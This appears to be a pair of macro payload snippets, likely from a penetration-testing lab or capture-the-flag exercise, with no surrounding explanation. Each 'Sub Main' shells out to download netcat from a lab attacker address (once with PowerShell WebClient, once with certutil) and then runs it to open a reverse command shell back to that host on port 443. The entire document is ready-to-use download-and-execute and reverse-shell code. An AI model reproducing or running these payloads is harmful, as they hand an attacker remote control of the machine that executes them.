Sub Main
shell("cmd /c powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.91/tools/nc.exe','c:\programdata\nc.exe');c:\programdata\nc.exe -e cmd 10.10.14.91 443")
End Sub
Sub Main
shell("cmd /c certutil -urlcache -split -f http://10.10.14.91/nc.exe C:\programdata\nc.exe && C:\programdata\nc.exe -e cmd 10.10.14.91 443")
End Sub